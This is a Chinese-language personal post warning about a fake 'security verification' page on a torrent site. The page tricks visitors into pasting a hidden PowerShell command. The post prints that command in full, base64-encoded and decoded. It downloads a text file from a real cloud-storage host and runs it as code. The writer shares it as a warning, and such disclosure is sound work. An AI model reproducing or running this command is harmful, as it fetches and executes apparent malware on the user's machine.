想下电影, 打开了一个种子下载的网站,https://www.torrentdownload.info/。 弹窗,只能点 ok 。 跳转到另外一个页面,tab 名叫安全认证。 我还以为是常见的真人认证,结果, 页面内容是: “Verification Steps
然后我就奇怪,这不是命令行吗,怎么会认证呢。 我就打开记事本,粘贴,出来一串命令。 “powershell -w hidden "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vemlwLXN0b3JlLm9zcy1hcC1zb3V0aGVhc3QtMS5hbGl5dW5jcy5jb20vRHJtZFBuT3oudHh0JykuQ29udGVudA==')) | iex"”。
然后我把中间一串 base64 解密。 得到“iex (iwr 'https://zip-store.oss-ap-southeast-1.aliyuncs.com/DrmdPnOz.txt').Content”。
我就想看下这个 txt 是什么内容, 在 chrome 里复制了这串地址,下载直接报危险, chrome 直接屏蔽了。 这也太恶心了吧。 如果真是病毒,照着做的人连下载都不知道。
我是第一次遇到这种。 命令行和网址都发出来了,只是分享经历,不是分享病毒,不建议去下载。